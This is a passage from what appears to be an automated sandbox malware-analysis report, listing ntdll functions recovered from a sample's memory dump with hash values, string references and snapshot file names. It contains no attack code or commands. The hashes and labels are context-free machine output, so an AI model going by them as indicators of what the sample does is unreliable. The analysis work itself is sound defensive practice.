                                                • Opcode Fuzzy Hash: 2d32661c580eb1edd8dbb6d6bae5a269901d8dd64ee14b33b4c19f563a68ee05
                                                • Instruction Fuzzy Hash: CA71C2B4E00305EFDB25DF68C984AAEB7F8FB84304F19442DE50AE7255E734AA41CB51
                                                Function 0193C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                Download Yara Rule
                                                Strings
                                                • Failed to reallocate the system dirs string !, xrefs: 019782D7
                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 019782DE
                                                • minkernel\ntdll\ldrinit.c, xrefs: 019782E8
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-1783798831
                                                • Opcode ID: 2a38cd90543a8e006dc571a16bc1fff56e1c58ee2027344f1ea944fd4623b82c
                                                • Instruction ID: 8da3dff9ec01d618d5a9285d548f74adc5ca05bd9be0bfb429530a78e1c90c8f
                                                • Opcode Fuzzy Hash: 2a38cd90543a8e006dc571a16bc1fff56e1c58ee2027344f1ea944fd4623b82c
                                                • Instruction Fuzzy Hash: 6641DD71648305BBD722EB68D888B5B77E8AF84750F10492EF94DE3294EB74E900CB91
                                                Function 019BC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                Download Yara Rule
                                                Strings
                                                • PreferredUILanguages, xrefs: 019BC212
                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 019BC1C5
                                                • @, xrefs: 019BC1F1
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                • API String ID: 0-2968386058
                                                • Opcode ID: c2c3eb9fc51cc3306af0c5397c7d53d0040a28072a48cc48aaa3b395c5c89437
                                                • Instruction ID: bc62388822c7d2b6b7cb8c7132f07c6858ae9d8f3e49c6b4ad0e238ab171c322
                                                • Opcode Fuzzy Hash: c2c3eb9fc51cc3306af0c5397c7d53d0040a28072a48cc48aaa3b395c5c89437
                                                • Instruction Fuzzy Hash: B0414171E0021AABEB11DBD8C991FEEBBBCAB54701F14416AEA0DF7240D774DA458B90
                                                Function 01994144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                • API String ID: 0-1373925480
                                                • Opcode ID: fc48c51350c99dcbdfc0cf7d1d9b10875cf959c8bce173e50377b1d8997327d8
                                                • Instruction ID: 4bc9eea09f505bbbb6e12d32e94c3faf67e621be9de8bd5af1747e73e7d495fd
                                                • Opcode Fuzzy Hash: fc48c51350c99dcbdfc0cf7d1d9b10875cf959c8bce173e50377b1d8997327d8
                                                • Instruction Fuzzy Hash: 5C411471A002488BEF27DBDDCA40BADBBB9FFA5340F14049AD909EB391D7358902CB50
                                                Function 01984755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                Download Yara Rule
                                                Strings
                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01984888
                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01984899
                                                • LdrpCheckRedirection, xrefs: 0198488F
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                • API String ID: 0-3154609507
                                                • Opcode ID: 82ff3bfa02c95b9f11f06470a5c1fad15fffce70ba648ee94e3cec72cdbe6044
                                                • Instruction ID: 7cd501b3b0762f0304f629324e669b203e2e3c28bb838e74ac4afd86d3597bc9
                                                • Opcode Fuzzy Hash: 82ff3bfa02c95b9f11f06470a5c1fad15fffce70ba648ee94e3cec72cdbe6044
                                                • Instruction Fuzzy Hash: 51418032A147529BCB21FE69D840F267BE8BF89A51F06056DED4DE7355E730E800CB92
                                                Function 01910BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-2558761708
                                                • Opcode ID: d584715e49c06d0481a972183371faf83fa45612c28de7c62ad8a1cbec7d8cfb
                                                • Instruction ID: dcdbf0cbe566f03ea2fe428820f830ab5db7669c7fcc7a6696288a19bb2f0d72
                                                • Opcode Fuzzy Hash: d584715e49c06d0481a972183371faf83fa45612c28de7c62ad8a1cbec7d8cfb
                                                • Instruction Fuzzy Hash: E211CD313551069FEB29CA18C480F7AB3A9EF40B5AF1A859EF40ECB255DB34D8C1C761
                                                Function 019820DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                Download Yara Rule
                                                Strings
                                                • Process initialization failed with status 0x%08lx, xrefs: 019820F3
                                                • LdrpInitializationFailure, xrefs: 019820FA
                                                • minkernel\ntdll\ldrinit.c, xrefs: 01982104
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-2986994758
                                                • Opcode ID: 9cbf2c0f2c37dbcae69bb3e0599854dfc558a3c42cda4942288625a0400eef7e
                                                • Instruction ID: b0bcad6bcec4282bdb050da8bc1a965f12d662df01eed5cc3df8bea7fd4145a6
                                                • Opcode Fuzzy Hash: 9cbf2c0f2c37dbcae69bb3e0599854dfc558a3c42cda4942288625a0400eef7e
                                                • Instruction Fuzzy Hash: BEF0F675640308BBE724F74CCC46FA937ACFB81B58F60005DF708B7685D6B4AA44C691
                                                Function 019103E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: #%u
                                                • API String ID: 48624451-232158463
                                                • Opcode ID: ae91e2246492d0809045d5ecfc5e0ca1e74f565c66aeee1fa1c58af63e2a322e
                                                • Instruction ID: 6e159f28ff9c1d39ba8741742a8e81808ea942027e466278ddf7d9e150b9981c
                                                • Opcode Fuzzy Hash: ae91e2246492d0809045d5ecfc5e0ca1e74f565c66aeee1fa1c58af63e2a322e
                                                • Instruction Fuzzy Hash: D1714A71A0014A9FDB01DFA8C990FAEBBF8BF58704F154065E909E7255EA34EE41CBA0
                                                Function 0190A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                Download Yara Rule
                                                Strings
                                                • LdrResSearchResource Enter, xrefs: 0190AA13
                                                • LdrResSearchResource Exit, xrefs: 0190AA25
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                • API String ID: 0-4066393604
                                                • Opcode ID: 1c8f42f73fb758d28130f9a97f24449550b187f5679ab7d23b47b34fb4c83728
                                                • Instruction ID: 2822ff9ff8df114af5b7d17acf1392be6aa1513ad4d157c93d10f71dbac2f072
                                                • Opcode Fuzzy Hash: 1c8f42f73fb758d28130f9a97f24449550b187f5679ab7d23b47b34fb4c83728
                                                • Instruction Fuzzy Hash: B2E16071E00719EFEB22CB99C980BAEBBBEBF54311F104525E909E7291D7749941CBA0
                                                Function 019CA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: `$`
                                                • API String ID: 0-197956300
                                                • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                • Instruction ID: bae96fafdf9e4eaf53558c53f95b2640a052daa36447ea6c457bedc749088488
                                                • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                • Instruction Fuzzy Hash: C3C1C13120434A9BE725CF28C845B6BBBE5BFD4B19F084A2CF6DA87290E774D505CB42
                                                Function 0197E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: Legacy$UEFI
                                                • API String ID: 2994545307-634100481
                                                • Opcode ID: b9c7049a10ea63320d99d8f11113988c1d550883e48e0e588f94bc4e8dca502c
                                                • Instruction ID: d7486499c80c889fd2f811a06a2153895d49fc10c9cfdc9b44c88963e38375ae
                                                • Opcode Fuzzy Hash: b9c7049a10ea63320d99d8f11113988c1d550883e48e0e588f94bc4e8dca502c
                                                • Instruction Fuzzy Hash: 92613A71E006199FDB25DFA8C884BAEBBB9FF48700F1444ADE649EB291D731A940CB51
                                                Function 019A43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$MUI
                                                • API String ID: 0-17815947
                                                • Opcode ID: d2dbfccaa40a0bfbc7758081c04eba11bc840e4f9f793b4111559e764e7fca69
                                                • Instruction ID: d0dbb734394f0ec12670179fdc70f9fab659ae8fe012d2e861b4a6ea53508070
                                                • Opcode Fuzzy Hash: d2dbfccaa40a0bfbc7758081c04eba11bc840e4f9f793b4111559e764e7fca69
                                                • Instruction Fuzzy Hash: 08512971D0021DAFDB11DFA9CC80EEEBBBCFB44755F540529E619A7280D6709A09CBA0
                                                Function 019004E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                Download Yara Rule
                                                Strings
                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0190063D
                                                • kLsE, xrefs: 01900540
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                • API String ID: 0-2547482624
                                                • Opcode ID: 00e6a15390c158c492838f1c9696497e2d25b99399b8983e1fbcf4efd556fab8
                                                • Instruction ID: b282dd8f5b1c91ee22309a4369bfd3d4bd9fc46af276cbd68b02a661c742ef8b
                                                • Opcode Fuzzy Hash: 00e6a15390c158c492838f1c9696497e2d25b99399b8983e1fbcf4efd556fab8
                                                • Instruction Fuzzy Hash: FB51F0715047028FD726DF29C8407A7BBE9AF84345F18493EFA9E87281E730D545CB92
                                                Function 0190A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                Download Yara Rule
                                                Strings
                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 0190A2FB
                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 0190A309
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                • API String ID: 0-2876891731
                                                • Opcode ID: db0aba28924d2c4f0f174dc9d27e31f173e7a6cf75f924974ad43108b93175b8
                                                • Instruction ID: 709c2e530dfbf1fe4cfd3772cfd40de6e445c34d8dfebba3a0e8f7d221a781ce
                                                • Opcode Fuzzy Hash: db0aba28924d2c4f0f174dc9d27e31f173e7a6cf75f924974ad43108b93175b8
                                                • Instruction Fuzzy Hash: 1141C130A04749DFDB16CF69C840B6D7BB8FF95711F144465E908DB291E7B5DA40CB90
                                                Function 0193A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: Cleanup Group$Threadpool!
                                                • API String ID: 2994545307-4008356553
                                                • Opcode ID: 71921b2b506aec9fb93cd21aa5df0a9eb8a2426923e21ac8468ea1a677d02cf3
                                                • Instruction ID: 7cf64cb832aa32b631c7b37fbfc4f87aafcc5b30078530aa0899722a9d010c6b
                                                • Opcode Fuzzy Hash: 71921b2b506aec9fb93cd21aa5df0a9eb8a2426923e21ac8468ea1a677d02cf3
                                                • Instruction Fuzzy Hash: 5301D1B2244704AFD311DF14DD45F1677E8E7C4719F018939A68CC71A0E338D904DB46
                                                Function 0190C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: MUI
                                                • API String ID: 0-1339004836
                                                • Opcode ID: e89491dc31f33aa620c9ece974dd99dd5c18f3b8149be9224aadee5142564c85
                                                • Instruction ID: 609d5487bcbe0e744b936b08028ed2da644fceeb245956c475722a56e1c51f87
                                                • Opcode Fuzzy Hash: e89491dc31f33aa620c9ece974dd99dd5c18f3b8149be9224aadee5142564c85
                                                • Instruction Fuzzy Hash: A9824E75E002199FEB26CFA9C880BEDBBB5BF44710F1481A9E95DAB391D7309D81CB50
                                                Function 01986420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID: 0-3916222277
                                                • Opcode ID: 5161ab1e0676b02404eb6c90599985ab3f4337868358030a432247b808d9a73e
                                                • Instruction ID: bc4366df94a0eb326c37c6ce4b2d85869d64686b2446a6c81fb35fefcde33a41
                                                • Opcode Fuzzy Hash: 5161ab1e0676b02404eb6c90599985ab3f4337868358030a432247b808d9a73e
                                                • Instruction Fuzzy Hash: D2917371940219AFEB21EF95CD85FAEBBB8EF58B50F100065F608BB194D775AD04CBA0
                                                Function 019AE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID: 0-3916222277
                                                • Opcode ID: 9dbccf1e1c1cb3ecf88dc8708462244b7417529711a63316a027a4026ed7d3b2
                                                • Instruction ID: 9d0d4adb6f3a03ae48da23a2e4a2bca968b3d01c27f95b03e5ed97f7b8e3b7bf
                                                • Opcode Fuzzy Hash: 9dbccf1e1c1cb3ecf88dc8708462244b7417529711a63316a027a4026ed7d3b2
                                                • Instruction Fuzzy Hash: D8919131901509BFDB22EBA5DC44FEFBB79EF85750F500019F909A7250EB749949CB90
                                                Function 0193A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: GlobalTags
                                                • API String ID: 0-1106856819
                                                • Opcode ID: 66fa002ad5ea0ef525d2a08cdea5fc1f632b33af6966683436a5e428b39a3516
                                                • Instruction ID: 9c28e28251b124fd81f119097ec4c00d3359935a1cfcf938b56ca7821c3f24bd
                                                • Opcode Fuzzy Hash: 66fa002ad5ea0ef525d2a08cdea5fc1f632b33af6966683436a5e428b39a3516
                                                • Instruction Fuzzy Hash: AE716CB5E0071A9FEF28CF9DC590AEDBBB5BF88741F14812EE509A7241E7319941CB50
                                                Function 019A4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .mui
                                                • API String ID: 0-1199573805
                                                • Opcode ID: 6775acf3dd7f91feae25464b5285caedd02eb3e094ef1097aa7f94d1849c8aba
                                                • Instruction ID: 7729ce5f5261964e18c4996144bf30bf6c05fcc0724ea6425da35a85df7e3415
                                                • Opcode Fuzzy Hash: 6775acf3dd7f91feae25464b5285caedd02eb3e094ef1097aa7f94d1849c8aba
                                                • Instruction Fuzzy Hash: 5051A772D0022A9FDF11DF99D840AAEBBB8BF44710F494129EA19B7250D7B49D05CBE4
                                                Function 0191E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: EXT-
                                                • API String ID: 0-1948896318
                                                • Opcode ID: 84a77c1d014fdf4fe774f4ad4295a1fb1ff85a9edc134cda10c7d4f526982131
                                                • Instruction ID: c76f9c2fc036b6e25c6af94f01c988dbc31a2b92341034bc7871b614a662363b
                                                • Opcode Fuzzy Hash: 84a77c1d014fdf4fe774f4ad4295a1fb1ff85a9edc134cda10c7d4f526982131
                                                • Instruction Fuzzy Hash: 6741A17250830A9BE712DA75C940F6BBBECAFC8714F440D2DFA8CD7144E674DA848796
                                                Function 0197C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: BinaryHash
                                                • API String ID: 0-2202222882
                                                • Opcode ID: bdeedad21c2ab4851af7e50928ff62402983dbc230552f41f4993ef9cb8bbaf0
                                                • Instruction ID: 4b78df64ae6a865d7be5852d47adf26ce934649c94d802bbd5db56095bf5eceb
                                                • Opcode Fuzzy Hash: bdeedad21c2ab4851af7e50928ff62402983dbc230552f41f4993ef9cb8bbaf0
                                                • Instruction Fuzzy Hash: F24132B1D0062EABDB21DB50DC84FDEB77CAF85714F0045A5AB0CAB140DB709E898FA5
                                                Function 01996B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: #
                                                • API String ID: 0-1885708031
                                                • Opcode ID: fd699309ffe23a84a7a6a3934e4ac580de34b61bcd77a84e2143bb83f38fba23
                                                • Instruction ID: bb38e16530b864478e667612167502021a780d74144ae55ccd843f666ce55881
                                                • Opcode Fuzzy Hash: fd699309ffe23a84a7a6a3934e4ac580de34b61bcd77a84e2143bb83f38fba23
                                                • Instruction Fuzzy Hash: F6310731E046599BEF22DB6DC850FAE7BA8DF45704F144028FA49AB282E765E805CB90
                                                Function 0198892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                Download Yara Rule
                                                Strings
                                                • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0198895E
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                • API String ID: 0-702105204
                                                • Opcode ID: a45bbaf4991db7fcab9770b41106c5252dfd1b0d624b460f016ecd140ce5c419
                                                • Instruction ID: e73d0bc4c7482fe7568bd0a224110b32c04163a84d9ab55ccbe9868819a2c355
                                                • Opcode Fuzzy Hash: a45bbaf4991db7fcab9770b41106c5252dfd1b0d624b460f016ecd140ce5c419
                                                • Instruction Fuzzy Hash: 4701F23A304201BFF631BB59CC84EAA7FA9EFC1794B44052CF74D56152CB22AC41C7A2
                                                Function 019A2000 Relevance: .8, Instructions: 757COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0b86362e0563591fc04808748791446561eeb9f64498a718cc50ebda99b97d93
                                                • Instruction ID: c7a65f57965f9d9e711b5ab1ac55421f050cb0ab4471b77be5260a940a983952
                                                • Opcode Fuzzy Hash: 0b86362e0563591fc04808748791446561eeb9f64498a718cc50ebda99b97d93
                                                • Instruction Fuzzy Hash: 4142C8356083419FE715CF68C890A6FBBE9BFC4700F89092DFA8A97250D771D949CB92
                                                Function 01998158 Relevance: .6, Instructions: 617COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cc89f75c45be40ea53a083d7018e2e5abe294ec5b88a37c65e3c9dec6ebfd3de
                                                • Instruction ID: fcc1db0203136c7401157177691da3d8e1d69bb64017951b7624a99f26d15c33
                                                • Opcode Fuzzy Hash: cc89f75c45be40ea53a083d7018e2e5abe294ec5b88a37c65e3c9dec6ebfd3de
                                                • Instruction Fuzzy Hash: 06425A75A102199FEF24CF69C881BADBBF5BF89301F15809DE94DAB242D7349981CF60
                                                Function 01912840 Relevance: .6, Instructions: 605COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5990a6b5a0fde975431fd0df90fc431a6c39cb3e7223e2bfa711db10a36b63c1
                                                • Instruction ID: dcbeb99108f089af92423be2f15b6f5c0be3fd450b1f76772adc122400059cd1
                                                • Opcode Fuzzy Hash: 5990a6b5a0fde975431fd0df90fc431a6c39cb3e7223e2bfa711db10a36b63c1
                                                • Instruction Fuzzy Hash: CE32F070A007598FDB25CF69C944BBEBBFABF84704F24451DD48E9B284D735A841CBA1
                                                Function 019AA118 Relevance: .6, Instructions: 591COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7a991b0ca27a02e44a3dd62ebcce21d015f0fb117d635ac54111efeed06eede1
                                                • Instruction ID: 223a1d0185d739d4f7228ffc878211eccc46e2a6e59400574726925dfc9316a9
                                                • Opcode Fuzzy Hash: 7a991b0ca27a02e44a3dd62ebcce21d015f0fb117d635ac54111efeed06eede1
                                                • Instruction Fuzzy Hash: AA22D1706046618FEB25CF2DC094776BBF5BF44301F888859E98E8F286D735E45ACBA4
                                                Function 01906A50 Relevance: .5, Instructions: 548COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e13939372674ad125fbc4038089ba81732d34c45b5d022cee5d8921dad34c759
                                                • Instruction ID: e7149514021c9867b6cb26cf75aa0d6f89ecd89a445be92ffb2ae1a55c172ed0
                                                • Opcode Fuzzy Hash: e13939372674ad125fbc4038089ba81732d34c45b5d022cee5d8921dad34c759
                                                • Instruction Fuzzy Hash: C632A171A04615CFDB26CF68C480BAEB7F9FF88310F148569E95AAB391D734E851CB60
                                                Function 01924A35 Relevance: .4, Instructions: 423COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                • Instruction ID: 3b0ccaaf7ded2fb630e0b7e30f1eef9d057771a784a6c93c3ec7dabdef65bdb9
                                                • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
